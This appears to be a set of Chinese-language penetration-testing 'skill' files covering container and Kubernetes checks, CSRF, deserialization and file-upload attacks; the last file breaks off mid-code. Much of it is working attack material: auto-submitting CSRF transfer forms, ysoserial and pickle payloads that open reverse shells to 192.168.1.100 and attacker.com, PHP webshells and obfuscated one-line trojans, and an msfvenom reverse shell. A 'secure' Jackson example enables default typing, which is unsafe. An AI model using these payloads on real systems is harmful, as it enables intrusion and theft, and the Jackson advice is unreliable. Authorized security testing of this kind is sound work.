# 运行Docker安全基准测试
|
||||
docker run --rm --net host --pid host --userns host --cap-add audit_control \
|
||||
-e DOCKER_CONTENT_TRUST=$DOCKER_CONTENT_TRUST \
|
||||
-v /etc:/etc:ro \
|
||||
-v /usr/bin/containerd:/usr/bin/containerd:ro \
|
||||
-v /usr/bin/runc:/usr/bin/runc:ro \
|
||||
-v /usr/lib/systemd:/usr/lib/systemd:ro \
|
||||
-v /var/lib:/var/lib:ro \
|
||||
-v /var/run/docker.sock:/var/run/docker.sock:ro \
|
||||
--label docker_bench_security \
|
||||
docker/docker-bench-security
|
||||
```
|
||||
|
||||
### 容器配置检查
|
||||
|
||||
**检查Dockerfile:**
|
||||
```dockerfile
|
||||
# 安全问题示例
|
||||
FROM ubuntu:latest # 使用latest标签
|
||||
RUN apt-get update && apt-get install -y curl # 未指定版本
|
||||
COPY . /app # 可能包含敏感文件
|
||||
ENV PASSWORD=secret # 硬编码密码
|
||||
USER root # 使用root用户
|
||||
```
|
||||
|
||||
**安全最佳实践:**
|
||||
```dockerfile
|
||||
# 使用特定版本
|
||||
FROM ubuntu:20.04
|
||||
|
||||
# 指定包版本
|
||||
RUN apt-get update && apt-get install -y curl=7.68.0-1ubuntu2.7
|
||||
|
||||
# 使用非root用户
|
||||
RUN useradd -m appuser
|
||||
USER appuser
|
||||
|
||||
# 最小化镜像
|
||||
FROM alpine:3.15
|
||||
|
||||
# 多阶段构建
|
||||
FROM golang:1.18 AS builder
|
||||
WORKDIR /app
|
||||
COPY . .
|
||||
RUN go build -o app
|
||||
|
||||
FROM alpine:3.15
|
||||
COPY --from=builder /app/app /app
|
||||
```
|
||||
|
||||
### 运行时检查
|
||||
|
||||
**检查容器权限:**
|
||||
```bash
|
||||
# 检查特权容器
|
||||
docker ps --filter "label=privileged=true"
|
||||
|
||||
# 检查挂载的主机目录
|
||||
docker inspect container_name | grep -A 10 Mounts
|
||||
|
||||
# 检查容器网络
|
||||
docker network inspect network_name
|
||||
```
|
||||
|
||||
**检查资源限制:**
|
||||
```bash
|
||||
# 检查内存限制
|
||||
docker stats container_name
|
||||
|
||||
# 检查CPU限制
|
||||
docker inspect container_name | grep -i cpu
|
||||
```
|
||||
|
||||
## Kubernetes安全测试
|
||||
|
||||
### 配置检查
|
||||
|
||||
**使用kube-bench:**
|
||||
```bash
|
||||
# 运行kube-bench
|
||||
kube-bench run
|
||||
|
||||
# 检查特定基准
|
||||
kube-bench run --targets master,node,etcd
|
||||
```
|
||||
|
||||
**使用kube-hunter:**
|
||||
```bash
|
||||
# 运行kube-hunter
|
||||
kube-hunter --remote target-ip
|
||||
|
||||
# 主动模式
|
||||
kube-hunter --active
|
||||
```
|
||||
|
||||
### Pod安全
|
||||
|
||||
**检查Pod安全策略:**
|
||||
```yaml
|
||||
# 不安全的Pod配置
|
||||
apiVersion: v1
|
||||
kind: Pod
|
||||
spec:
|
||||
containers:
|
||||
- name: app
|
||||
image: nginx
|
||||
securityContext:
|
||||
privileged: true # 特权模式
|
||||
runAsUser: 0 # root用户
|
||||
```
|
||||
|
||||
**安全配置:**
|
||||
```yaml
|
||||
apiVersion: v1
|
||||
kind: Pod
|
||||
spec:
|
||||
securityContext:
|
||||
runAsNonRoot: true
|
||||
runAsUser: 1000
|
||||
fsGroup: 2000
|
||||
containers:
|
||||
- name: app
|
||||
image: nginx
|
||||
securityContext:
|
||||
allowPrivilegeEscalation: false
|
||||
readOnlyRootFilesystem: true
|
||||
capabilities:
|
||||
drop:
|
||||
- ALL
|
||||
add:
|
||||
- NET_BIND_SERVICE
|
||||
```
|
||||
|
||||
### RBAC检查
|
||||
|
||||
**检查角色权限:**
|
||||
```bash
|
||||
# 列出所有角色
|
||||
kubectl get roles --all-namespaces
|
||||
|
||||
# 检查角色绑定
|
||||
kubectl get rolebindings --all-namespaces
|
||||
|
||||
# 检查集群角色
|
||||
kubectl get clusterroles
|
||||
|
||||
# 检查用户权限
|
||||
kubectl auth can-i --list --as=system:serviceaccount:default:sa-name
|
||||
```
|
||||
|
||||
**常见问题:**
|
||||
- 过度权限
|
||||
- 未使用的角色
|
||||
- 未使用的服务账户
|
||||
|
||||
### 网络策略
|
||||
|
||||
**检查网络策略:**
|
||||
```bash
|
||||
# 列出所有网络策略
|
||||
kubectl get networkpolicies --all-namespaces
|
||||
|
||||
# 检查网络策略配置
|
||||
kubectl describe networkpolicy policy-name -n namespace
|
||||
```
|
||||
|
||||
**网络策略示例:**
|
||||
```yaml
|
||||
apiVersion: networking.k8s.io/v1
|
||||
kind: NetworkPolicy
|
||||
metadata:
|
||||
name: default-deny
|
||||
spec:
|
||||
podSelector: {}
|
||||
policyTypes:
|
||||
- Ingress
|
||||
- Egress
|
||||
```
|
||||
|
||||
## 工具使用
|
||||
|
||||
### Falco
|
||||
|
||||
**运行时安全监控:**
|
||||
```bash
|
||||
# 安装Falco
|
||||
helm repo add falcosecurity https://falcosecurity.github.io/charts
|
||||
helm install falco falcosecurity/falco
|
||||
|
||||
# 检查规则
|
||||
falco -r /etc/falco/rules.d/
|
||||
```
|
||||
|
||||
### Aqua Security
|
||||
|
||||
```bash
|
||||
# 扫描镜像
|
||||
aqua image scan nginx:latest
|
||||
|
||||
# 扫描Kubernetes集群
|
||||
aqua k8s scan
|
||||
```
|
||||
|
||||
### Snyk
|
||||
|
||||
```bash
|
||||
# 扫描Dockerfile
|
||||
snyk test --docker nginx:latest
|
||||
|
||||
# 扫描Kubernetes配置
|
||||
snyk iac test k8s/
|
||||
```
|
||||
|
||||
## 测试清单
|
||||
|
||||
### 镜像安全
|
||||
- [ ] 扫描基础镜像漏洞
|
||||
- [ ] 扫描依赖包漏洞
|
||||
- [ ] 检查Dockerfile配置
|
||||
- [ ] 检查敏感信息泄露
|
||||
|
||||
### 运行时安全
|
||||
- [ ] 检查容器权限
|
||||
- [ ] 检查资源限制
|
||||
- [ ] 检查网络隔离
|
||||
- [ ] 检查文件系统挂载
|
||||
|
||||
### 编排安全
|
||||
- [ ] 检查Kubernetes配置
|
||||
- [ ] 检查RBAC配置
|
||||
- [ ] 检查网络策略
|
||||
- [ ] 检查Pod安全策略
|
||||
|
||||
## 常见安全问题
|
||||
|
||||
### 1. 镜像漏洞
|
||||
|
||||
**问题:**
|
||||
- 基础镜像包含漏洞
|
||||
- 依赖包包含漏洞
|
||||
- 未及时更新
|
||||
|
||||
**修复:**
|
||||
- 定期扫描镜像
|
||||
- 及时更新基础镜像
|
||||
- 使用最小化镜像
|
||||
|
||||
### 2. 过度权限
|
||||
|
||||
**问题:**
|
||||
- 容器以root运行
|
||||
- 特权模式
|
||||
- 挂载敏感目录
|
||||
|
||||
**修复:**
|
||||
- 使用非root用户
|
||||
- 禁用特权模式
|
||||
- 限制文件系统访问
|
||||
|
||||
### 3. 配置错误
|
||||
|
||||
**问题:**
|
||||
- 默认配置不安全
|
||||
- 网络策略缺失
|
||||
- RBAC配置错误
|
||||
|
||||
**修复:**
|
||||
- 遵循安全最佳实践
|
||||
- 实施网络策略
|
||||
- 正确配置RBAC
|
||||
|
||||
### 4. 敏感信息泄露
|
||||
|
||||
**问题:**
|
||||
- 镜像包含密钥
|
||||
- 环境变量暴露
|
||||
- 配置文件泄露
|
||||
|
||||
**修复:**
|
||||
- 使用密钥管理
|
||||
- 避免硬编码
|
||||
- 使用Secret对象
|
||||
|
||||
## 最佳实践
|
||||
|
||||
### 1. 镜像安全
|
||||
|
||||
- 使用官方基础镜像
|
||||
- 定期更新镜像
|
||||
- 扫描镜像漏洞
|
||||
- 最小化镜像大小
|
||||
|
||||
### 2. 运行时安全
|
||||
|
||||
- 使用非root用户
|
||||
- 限制容器权限
|
||||
- 实施资源限制
|
||||
- 启用安全上下文
|
||||
|
||||
### 3. 编排安全
|
||||
|
||||
- 配置网络策略
|
||||
- 实施RBAC
|
||||
- 使用Pod安全策略
|
||||
- 启用审计日志
|
||||
|
||||
## 注意事项
|
||||
|
||||
- 仅在授权环境中进行测试
|
||||
- 避免对生产环境造成影响
|
||||
- 注意不同容器平台的差异
|
||||
- 定期进行安全扫描
|
||||
@@ -0,0 +1,199 @@
|
||||
---
|
||||
name: csrf-testing
|
||||
description: CSRF跨站请求伪造测试的专业技能和方法论
|
||||
version: 1.0.0
|
||||
---
|
||||
|
||||
# CSRF跨站请求伪造测试
|
||||
|
||||
## 概述
|
||||
|
||||
CSRF(Cross-Site Request Forgery)是一种利用用户已登录状态进行未授权操作的攻击方式。本技能提供CSRF漏洞的检测、利用和防护方法。
|
||||
|
||||
## 漏洞原理
|
||||
|
||||
- 攻击者诱导用户访问恶意页面
|
||||
- 恶意页面自动发送请求到目标网站
|
||||
- 浏览器自动携带用户的认证信息(Cookie、Session)
|
||||
- 目标网站误认为是用户合法操作
|
||||
|
||||
## 测试方法
|
||||
|
||||
### 1. 识别敏感操作
|
||||
|
||||
- 密码修改
|
||||
- 邮箱修改
|
||||
- 转账操作
|
||||
- 权限变更
|
||||
- 数据删除
|
||||
- 状态更新
|
||||
|
||||
### 2. 检测CSRF Token
|
||||
|
||||
**检查是否有Token保护:**
|
||||
```html
|
||||
<!-- 有Token保护 -->
|
||||
<form method="POST" action="/change-password">
|
||||
<input type="hidden" name="csrf_token" value="abc123">
|
||||
<input type="password" name="new_password">
|
||||
</form>
|
||||
|
||||
<!-- 无Token保护 - 存在CSRF风险 -->
|
||||
<form method="POST" action="/change-email">
|
||||
<input type="email" name="new_email">
|
||||
</form>
|
||||
```
|
||||
|
||||
### 3. 验证Token有效性
|
||||
|
||||
**测试Token是否可预测:**
|
||||
- Token是否基于时间戳
|
||||
- Token是否基于用户ID
|
||||
- Token是否可重复使用
|
||||
- Token是否在多个请求间共享
|
||||
|
||||
### 4. 检查Referer验证
|
||||
|
||||
**测试Referer检查是否可绕过:**
|
||||
```javascript
|
||||
// 正常请求
|
||||
Referer: https://target.com/change-password
|
||||
|
||||
// 测试绕过
|
||||
Referer: https://target.com.evil.com
|
||||
Referer: https://evil.com/?target.com
|
||||
Referer: (空)
|
||||
```
|
||||
|
||||
## 利用技术
|
||||
|
||||
### 基础CSRF攻击
|
||||
|
||||
**HTML表单自动提交:**
|
||||
```html
|
||||
<form action="https://target.com/api/transfer" method="POST" id="csrf">
|
||||
<input type="hidden" name="to" value="attacker_account">
|
||||
<input type="hidden" name="amount" value="10000">
|
||||
</form>
|
||||
<script>document.getElementById('csrf').submit();</script>
|
||||
```
|
||||
|
||||
### JSON CSRF
|
||||
|
||||
**绕过Content-Type检查:**
|
||||
```html
|
||||
<!-- 使用form表单提交JSON -->
|
||||
<form action="https://target.com/api/update" method="POST" enctype="text/plain">
|
||||
<input name='{"email":"attacker@evil.com","ignore":"' value='"}'>
|
||||
</form>
|
||||
<script>document.forms[0].submit();</script>
|
||||
```
|
||||
|
||||
### GET请求CSRF
|
||||
|
||||
**利用GET请求进行攻击:**
|
||||
```html
|
||||
<img src="https://target.com/api/delete?id=123">
|
||||
```
|
||||
|
||||
## 绕过技术
|
||||
|
||||
### Token绕过
|
||||
|
||||
**如果Token在Cookie中:**
|
||||
```javascript
|
||||
// 如果Token同时存在于Cookie和表单中
|
||||
// 可以尝试只提交Cookie中的Token
|
||||
fetch('https://target.com/api/action', {
|
||||
method: 'POST',
|
||||
credentials: 'include',
|
||||
body: 'action=delete&id=123'
|
||||
// 不包含csrf_token参数,依赖Cookie
|
||||
});
|
||||
```
|
||||
|
||||
### SameSite Cookie绕过
|
||||
|
||||
**利用子域名:**
|
||||
- 如果SameSite=Lax,GET请求仍可携带Cookie
|
||||
- 利用子域名进行攻击
|
||||
|
||||
### 双重提交Cookie
|
||||
|
||||
**绕过Token验证:**
|
||||
```html
|
||||
<!-- 如果Token在Cookie中,且验证逻辑有缺陷 -->
|
||||
<form action="https://target.com/api/action" method="POST">
|
||||
<input type="hidden" name="csrf_token" value="">
|
||||
<script>
|
||||
// 从Cookie中读取Token
|
||||
document.cookie.split(';').forEach(c => {
|
||||
if(c.trim().startsWith('csrf_token=')) {
|
||||
document.querySelector('input[name="csrf_token"]').value =
|
||||
c.split('=')[1];
|
||||
}
|
||||
});
|
||||
</script>
|
||||
</form>
|
||||
```
|
||||
|
||||
## 工具使用
|
||||
|
||||
### Burp Suite
|
||||
|
||||
**使用CSRF PoC生成器:**
|
||||
1. 拦截目标请求
|
||||
2. 右键 → Engagement tools → Generate CSRF PoC
|
||||
3. 测试生成的PoC
|
||||
|
||||
### OWASP ZAP
|
||||
|
||||
```bash
|
||||
# 使用ZAP进行CSRF扫描
|
||||
zap-cli quick-scan --self-contained --start-options '-config api.disablekey=true' http://target.com
|
||||
```
|
||||
|
||||
## 验证和报告
|
||||
|
||||
### 验证步骤
|
||||
|
||||
1. 确认目标操作没有CSRF Token保护
|
||||
2. 构造恶意请求并验证可执行
|
||||
3. 评估影响(数据泄露、权限提升、资金损失等)
|
||||
4. 记录完整的POC
|
||||
|
||||
### 报告要点
|
||||
|
||||
- 漏洞位置和受影响的操作
|
||||
- 攻击场景和影响范围
|
||||
- 完整的利用步骤和PoC
|
||||
- 修复建议(CSRF Token、SameSite Cookie、Referer验证等)
|
||||
|
||||
## 防护措施
|
||||
|
||||
### 推荐方案
|
||||
|
||||
1. **CSRF Token**
|
||||
- 每个表单包含唯一Token
|
||||
- Token存储在Session中
|
||||
- 验证Token有效性
|
||||
|
||||
2. **SameSite Cookie**
|
||||
```javascript
|
||||
Set-Cookie: session=abc123; SameSite=Strict; Secure
|
||||
```
|
||||
|
||||
3. **双重提交Cookie**
|
||||
- Token同时存在于Cookie和表单
|
||||
- 验证两者是否匹配
|
||||
|
||||
4. **Referer验证**
|
||||
- 验证Referer是否为同源
|
||||
- 注意空Referer的处理
|
||||
|
||||
## 注意事项
|
||||
|
||||
- 仅在授权测试环境中进行
|
||||
- 避免对用户账户造成实际影响
|
||||
- 记录所有测试步骤
|
||||
- 考虑不同浏览器的行为差异
|
||||
@@ -0,0 +1,310 @@
|
||||
---
|
||||
name: deserialization-testing
|
||||
description: 反序列化漏洞测试的专业技能和方法论
|
||||
version: 1.0.0
|
||||
---
|
||||
|
||||
# 反序列化漏洞测试
|
||||
|
||||
## 概述
|
||||
|
||||
反序列化漏洞是一种利用应用程序反序列化不可信数据导致的漏洞,可能导致远程代码执行、拒绝服务等。本技能提供反序列化漏洞的检测、利用和防护方法。
|
||||
|
||||
## 漏洞原理
|
||||
|
||||
应用程序将序列化的数据反序列化为对象时,如果数据来源不可信,攻击者可以构造恶意序列化数据,在反序列化过程中执行任意代码。
|
||||
|
||||
## 常见格式
|
||||
|
||||
### Java
|
||||
|
||||
**常见库:**
|
||||
- Java原生序列化
|
||||
- Jackson
|
||||
- Fastjson
|
||||
- XStream
|
||||
- Apache Commons Collections
|
||||
|
||||
### PHP
|
||||
|
||||
**常见函数:**
|
||||
- unserialize()
|
||||
- json_decode()
|
||||
|
||||
### Python
|
||||
|
||||
**常见模块:**
|
||||
- pickle
|
||||
- yaml
|
||||
- json
|
||||
|
||||
### .NET
|
||||
|
||||
**常见类:**
|
||||
- BinaryFormatter
|
||||
- SoapFormatter
|
||||
- DataContractSerializer
|
||||
|
||||
## 测试方法
|
||||
|
||||
### 1. 识别序列化数据
|
||||
|
||||
**Java序列化特征:**
|
||||
```
|
||||
AC ED 00 05 (十六进制)
|
||||
rO0 (Base64)
|
||||
```
|
||||
|
||||
**PHP序列化特征:**
|
||||
```
|
||||
O:8:"stdClass"
|
||||
a:2:{s:4:"test";s:4:"data";}
|
||||
```
|
||||
|
||||
**Python pickle特征:**
|
||||
```
|
||||
\x80\x03
|
||||
```
|
||||
|
||||
### 2. 检测反序列化点
|
||||
|
||||
**常见位置:**
|
||||
- Cookie值
|
||||
- Session数据
|
||||
- API参数
|
||||
- 文件上传
|
||||
- 缓存数据
|
||||
- 消息队列
|
||||
|
||||
### 3. Java反序列化
|
||||
|
||||
**Apache Commons Collections利用:**
|
||||
```java
|
||||
// 使用ysoserial生成Payload
|
||||
java -jar ysoserial.jar CommonsCollections1 "command" > payload.bin
|
||||
```
|
||||
|
||||
**常见Gadget链:**
|
||||
- CommonsCollections1-7
|
||||
- Spring1-2
|
||||
- ROME
|
||||
- Jdk7u21
|
||||
|
||||
### 4. PHP反序列化
|
||||
|
||||
**基础测试:**
|
||||
```php
|
||||
<?php
|
||||
class Test {
|
||||
public $cmd = "id";
|
||||
function __destruct() {
|
||||
system($this->cmd);
|
||||
}
|
||||
}
|
||||
echo serialize(new Test());
|
||||
// O:4:"Test":1:{s:3:"cmd";s:2:"id";}
|
||||
?>
|
||||
```
|
||||
|
||||
**魔术方法利用:**
|
||||
- __destruct()
|
||||
- __wakeup()
|
||||
- __toString()
|
||||
- __call()
|
||||
|
||||
### 5. Python pickle
|
||||
|
||||
**基础测试:**
|
||||
```python
|
||||
import pickle
|
||||
import os
|
||||
|
||||
class RCE:
|
||||
def __reduce__(self):
|
||||
return (os.system, ('id',))
|
||||
|
||||
pickle.dumps(RCE())
|
||||
```
|
||||
|
||||
## 利用技术
|
||||
|
||||
### Java RCE
|
||||
|
||||
**使用ysoserial:**
|
||||
```bash
|
||||
# 生成Payload
|
||||
java -jar ysoserial.jar CommonsCollections1 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMTAwLzQ0NDQgMD4mMQ==}|{base64,-d}|{bash,-i}" > payload.bin
|
||||
|
||||
# Base64编码
|
||||
base64 -w 0 payload.bin
|
||||
```
|
||||
|
||||
**手动构造:**
|
||||
```java
|
||||
// 使用Gadget链构造恶意对象
|
||||
// 参考ysoserial源码
|
||||
```
|
||||
|
||||
### PHP RCE
|
||||
|
||||
**利用POP链:**
|
||||
```php
|
||||
<?php
|
||||
class A {
|
||||
public $b;
|
||||
function __destruct() {
|
||||
$this->b->test();
|
||||
}
|
||||
}
|
||||
|
||||
class B {
|
||||
public $c;
|
||||
function test() {
|
||||
call_user_func($this->c, "id");
|
||||
}
|
||||
}
|
||||
|
||||
$a = new A();
|
||||
$a->b = new B();
|
||||
$a->b->c = "system";
|
||||
echo serialize($a);
|
||||
?>
|
||||
```
|
||||
|
||||
### Python RCE
|
||||
|
||||
**Pickle RCE:**
|
||||
```python
|
||||
import pickle
|
||||
import base64
|
||||
import os
|
||||
|
||||
class RCE:
|
||||
def __reduce__(self):
|
||||
return (os.system, ('bash -i >& /dev/tcp/attacker.com/4444 0>&1',))
|
||||
|
||||
payload = pickle.dumps(RCE())
|
||||
print(base64.b64encode(payload))
|
||||
```
|
||||
|
||||
## 绕过技术
|
||||
|
||||
### 编码绕过
|
||||
|
||||
**Base64编码:**
|
||||
```
|
||||
原始: rO0ABXNy...
|
||||
编码: ck8wQUJYTnk...
|
||||
```
|
||||
|
||||
**URL编码:**
|
||||
```
|
||||
%72%4F%00%AB...
|
||||
```
|
||||
|
||||
### 过滤器绕过
|
||||
|
||||
**使用不同Gadget链:**
|
||||
- 如果CommonsCollections被过滤,尝试Spring
|
||||
- 如果某个版本被过滤,尝试其他版本
|
||||
|
||||
### 类名混淆
|
||||
|
||||
**使用反射:**
|
||||
```java
|
||||
Class.forName("java.lang.Runtime").getMethod("exec", String.class)
|
||||
```
|
||||
|
||||
## 工具使用
|
||||
|
||||
### ysoserial
|
||||
|
||||
```bash
|
||||
# 列出可用Gadget
|
||||
java -jar ysoserial.jar
|
||||
|
||||
# 生成Payload
|
||||
java -jar ysoserial.jar CommonsCollections1 "command" > payload.bin
|
||||
|
||||
# 生成Base64
|
||||
java -jar ysoserial.jar CommonsCollections1 "command" | base64
|
||||
```
|
||||
|
||||
### PHPGGC
|
||||
|
||||
```bash
|
||||
# 列出可用Gadget
|
||||
./phpggc -l
|
||||
|
||||
# 生成Payload
|
||||
./phpggc Monolog/RCE1 system id
|
||||
|
||||
# 生成编码Payload
|
||||
./phpggc -b Monolog/RCE1 system id
|
||||
```
|
||||
|
||||
### Burp Suite
|
||||
|
||||
1. 拦截包含序列化数据的请求
|
||||
2. 使用插件生成Payload
|
||||
3. 替换原始数据
|
||||
4. 观察响应
|
||||
|
||||
## 验证和报告
|
||||
|
||||
### 验证步骤
|
||||
|
||||
1. 确认可以控制序列化数据
|
||||
2. 验证反序列化触发代码执行
|
||||
3. 评估影响(RCE、数据泄露等)
|
||||
4. 记录完整的POC
|
||||
|
||||
### 报告要点
|
||||
|
||||
- 漏洞位置和序列化数据格式
|
||||
- 使用的Gadget链或利用方式
|
||||
- 完整的利用步骤和PoC
|
||||
- 修复建议(输入验证、使用安全序列化等)
|
||||
|
||||
## 防护措施
|
||||
|
||||
### 推荐方案
|
||||
|
||||
1. **避免反序列化不可信数据**
|
||||
- 使用JSON替代
|
||||
- 使用安全的序列化格式
|
||||
|
||||
2. **输入验证**
|
||||
```java
|
||||
// 白名单验证类名
|
||||
private static final Set<String> ALLOWED_CLASSES =
|
||||
Set.of("com.example.SafeClass");
|
||||
|
||||
private Object readObject(ObjectInputStream ois) {
|
||||
// 验证类名
|
||||
// ...
|
||||
}
|
||||
```
|
||||
|
||||
3. **使用安全配置**
|
||||
```java
|
||||
// Jackson配置
|
||||
objectMapper.enableDefaultTyping();
|
||||
objectMapper.setVisibility(PropertyAccessor.FIELD,
|
||||
JsonAutoDetect.Visibility.ANY);
|
||||
```
|
||||
|
||||
4. **类加载器隔离**
|
||||
- 使用自定义ClassLoader
|
||||
- 限制可加载的类
|
||||
|
||||
5. **监控和日志**
|
||||
- 记录反序列化操作
|
||||
- 监控异常行为
|
||||
|
||||
## 注意事项
|
||||
|
||||
- 仅在授权测试环境中进行
|
||||
- 注意不同版本库的Gadget链差异
|
||||
- 测试时注意Payload大小限制
|
||||
- 了解目标应用的依赖库版本
|
||||
@@ -0,0 +1,328 @@
|
||||
---
|
||||
name: file-upload-testing
|
||||
description: 文件上传漏洞测试的专业技能和方法论
|
||||
version: 1.0.0
|
||||
---
|
||||
|
||||
# 文件上传漏洞测试
|
||||
|
||||
## 概述
|
||||
|
||||
文件上传功能是Web应用常见功能,但存在多种安全风险。本技能提供文件上传漏洞的检测、利用和防护方法。
|
||||
|
||||
## 漏洞类型
|
||||
|
||||
### 1. 未验证文件类型
|
||||
|
||||
**仅前端验证:**
|
||||
```javascript
|
||||
// 可被绕过
|
||||
if (!file.name.endsWith('.jpg')) {
|
||||
alert('只允许上传图片');
|
||||
}
|
||||
```
|
||||
|
||||
### 2. 文件内容未验证
|
||||
|
||||
**仅检查扩展名:**
|
||||
```php
|
||||
// 危险代码
|
||||
if (pathinfo($_FILES['file']['name'], PATHINFO_EXTENSION) == 'jpg') {
|
||||
move_uploaded_file($_FILES['file']['tmp_name'], 'uploads/' . $filename);
|
||||
}
|
||||
```
|
||||
|
||||
### 3. 路径遍历
|
||||
|
||||
**未过滤文件名:**
|
||||
```
|
||||
filename: ../../../etc/passwd
|
||||
filename: ..\..\..\windows\system32\config\sam
|
||||
```
|
||||
|
||||
### 4. 文件名覆盖
|
||||
|
||||
**可预测的文件名:**
|
||||
```
|
||||
uploads/1.jpg
|
||||
uploads/2.jpg
|
||||
```
|
||||
|
||||
## 测试方法
|
||||
|
||||
### 1. 基础检测
|
||||
|
||||
**测试各种文件类型:**
|
||||
- .php, .jsp, .asp, .aspx
|
||||
- .php3, .php4, .php5, .phtml
|
||||
- .jspx, .jspf
|
||||
- .htaccess, .htpasswd
|
||||
|
||||
**测试双扩展名:**
|
||||
```
|
||||
shell.php.jpg
|
||||
shell.jpg.php
|
||||
```
|
||||
|
||||
**测试大小写:**
|
||||
```
|
||||
shell.PHP
|
||||
shell.PhP
|
||||
```
|
||||
|
||||
### 2. 内容类型绕过
|
||||
|
||||
**修改Content-Type:**
|
||||
```
|
||||
Content-Type: image/jpeg
|
||||
# 但文件内容是PHP代码
|
||||
```
|
||||
|
||||
**Magic Bytes:**
|
||||
```php
|
||||
// 在PHP代码前添加图片头
|
||||
GIF89a<?php phpinfo(); ?>
|
||||
```
|
||||
|
||||
### 3. 解析漏洞
|
||||
|
||||
**Apache解析漏洞:**
|
||||
```
|
||||
shell.php.xxx # Apache可能解析为PHP
|
||||
```
|
||||
|
||||
**IIS解析漏洞:**
|
||||
```
|
||||
shell.asp;.jpg
|
||||
shell.asp:.jpg
|
||||
```
|
||||
|
||||
**Nginx解析漏洞:**
|
||||
```
|
||||
shell.jpg%00.php
|
||||
```
|
||||
|
||||
### 4. 竞争条件
|
||||
|
||||
**文件上传后立即访问:**
|
||||
```python
|
||||
# 上传.php文件,在上传完成但删除前访问
|
||||
import requests
|
||||
import threading
|
||||
|
||||
def upload():
|
||||
files = {'file': ('shell.php', '<?php system($_GET["cmd"]); ?>')}
|
||||
requests.post('http://target.com/upload', files=files)
|
||||
|
||||
def access():
|
||||
time.sleep(0.1)
|
||||
requests.get('http://target.com/uploads/shell.php?cmd=id')
|
||||
|
||||
threading.Thread(target=upload).start()
|
||||
threading.Thread(target=access).start()
|
||||
```
|
||||
|
||||
## 利用技术
|
||||
|
||||
### PHP WebShell
|
||||
|
||||
**基础WebShell:**
|
||||
```php
|
||||
<?php system($_GET['cmd']); ?>
|
||||
```
|
||||
|
||||
**一句话木马:**
|
||||
```php
|
||||
<?php eval($_POST['a']); ?>
|
||||
```
|
||||
|
||||
**绕过过滤:**
|
||||
```php
|
||||
<?php
|
||||
$_GET['cmd']($_POST['a']);
|
||||
// 使用: ?cmd=system
|
||||
```
|
||||
|
||||
### .htaccess利用
|
||||
|
||||
**上传.htaccess:**
|
||||
```
|
||||
AddType application/x-httpd-php .jpg
|
||||
```
|
||||
|
||||
**然后上传shell.jpg(实际是PHP代码)**
|
||||
|
||||
### 图片马
|
||||
|
||||
**GIF图片马:**
|
||||
```php
|
||||
GIF89a
|
||||
<?php
|
||||
phpinfo();
|
||||
?>
|
||||
```
|
||||
|
||||
**PNG图片马:**
|
||||
```bash
|
||||
# 使用工具将PHP代码嵌入PNG
|
||||
python3 png2php.py shell.php shell.png
|
||||
```
|
||||
|
||||
### 文件包含配合
|
||||
|
||||
**如果存在文件包含漏洞:**
|
||||
```
|
||||
# 上传包含PHP代码的图片
|
||||
# 然后通过文件包含执行
|
||||
?file=uploads/shell.jpg
|
||||
```
|
||||
|
||||
## 绕过技术
|
||||
|
||||
### 扩展名绕过
|
||||
|
||||
**双扩展名:**
|
||||
```
|
||||
shell.php.jpg
|
||||
shell.php;.jpg
|
||||
shell.php%00.jpg
|
||||
```
|
||||
|
||||
**大小写:**
|
||||
```
|
||||
shell.PHP
|
||||
shell.PhP
|
||||
```
|
||||
|
||||
**特殊字符:**
|
||||
```
|
||||
shell.php.
|
||||
shell.php
|
||||
shell.php%20
|
||||
```
|
||||
|
||||
### Content-Type绕过
|
||||
|
||||
**修改请求头:**
|
||||
```
|
||||
Content-Type: image/jpeg
|
||||
Content-Type: image/png
|
||||
Content-Type: image/gif
|
||||
```
|
||||
|
||||
### Magic Bytes绕过
|
||||
|
||||
**添加文件头:**
|
||||
```php
|
||||
// JPEG
|
||||
\xFF\xD8\xFF\xE0<?php phpinfo(); ?>
|
||||
|
||||
// GIF
|
||||
GIF89a<?php phpinfo(); ?>
|
||||
|
||||
// PNG
|
||||
\x89\x50\x4E\x47<?php phpinfo(); ?>
|
||||
```
|
||||
|
||||
### 代码混淆
|
||||
|
||||
**使用短标签:**
|
||||
```php
|
||||
<?= system($_GET['cmd']); ?>
|
||||
```
|
||||
|
||||
**使用变量:**
|
||||
```php
|
||||
<?php
|
||||
$a='sys';
|
||||
$b='tem';
|
||||
$a.$b($_GET['cmd']);
|
||||
```
|
||||
|
||||
## 工具使用
|
||||
|
||||
### Burp Suite
|
||||
|
||||
1. 拦截文件上传请求
|
||||
2. 修改文件名和内容
|
||||
3. 测试各种绕过技术
|
||||
|
||||
### Upload Bypass
|
||||
|
||||
```bash
|
||||
# 使用各种技术测试文件上传
|
||||
python upload_bypass.py -u http://target.com/upload -f shell.php
|
||||
```
|
||||
|
||||
### WebShell生成
|
||||
|
||||
```bash
|
||||
# 生成各种WebShell
|
||||
msfvenom -p php/meterpreter/reverse_tcp LHOST=attacker.com LPORT=4444 -f raw > shell.php
|
||||
```
|
||||
|
||||
## 验证和报告
|
||||
|
||||
### 验证步骤
|
||||
|
||||
1. 确认可以上传恶意文件
|
||||
2. 验证文件可以执行
|
||||
3. 评估影响(命令执行、数据泄露等)
|
||||
4. 记录完整的POC
|
||||
|
||||
### 报告要点
|
||||
|
||||
- 漏洞位置和上传功能
|
||||
- 可上传的文件类型和执行方式
|
||||
- 完整的利用步骤和PoC
|
||||
- 修复建议(文件类型验证、内容检查、安全存储等)
|
||||
|
||||
## 防护措施
|
||||
|
||||
### 推荐方案
|
||||
|
||||
1. **文件类型白名单**
|
||||
```python
|
||||
ALLOWED_EXTENSIONS = {'jpg', 'png', 'gif'}
|
||||
ext = filename.rsplit('.', 1)[1].lower()
|
||||
if ext not in ALLOWED_EXTENSIONS:
|
||||
raise ValueError("File type not allowed")
|
||||
```
|
||||
|
||||
2. **文件内容验证**
|
||||
```python
|
||||
import magic
|
||||
file_type = magic.from_buffer(file_content, mime=True)
|
||||
if not file_type.startswith('image/'):
|
||||
raise ValueError("Invalid file content")
|
||||
```
|
||||
|
||||
3. **重命名文件**
|
||||
```python
|
||||
import uuid
|
||||
filename = str(uuid.uuid4()) + '.' + ext
|
||||
```
|
||||
|
||||
4. **隔离存储**
|
||||
- 文件存储在Web根目录外
|
||||
- 通过脚本代理访问
|
||||
- 禁用执行权限
|
||||
|
||||
5. **文件扫描**
|
||||
- 使用杀毒软件扫描
|
||||
- 检查文件内容
|
||||
- 移除可执行权限
|
||||
|
||||
6. **大小限制**
|
||||
```python
|
||||
MAX_SIZE = 5 * 1024 * 1024 # 5MB
|
||||
if file.size > MAX_SIZE:
|
||||
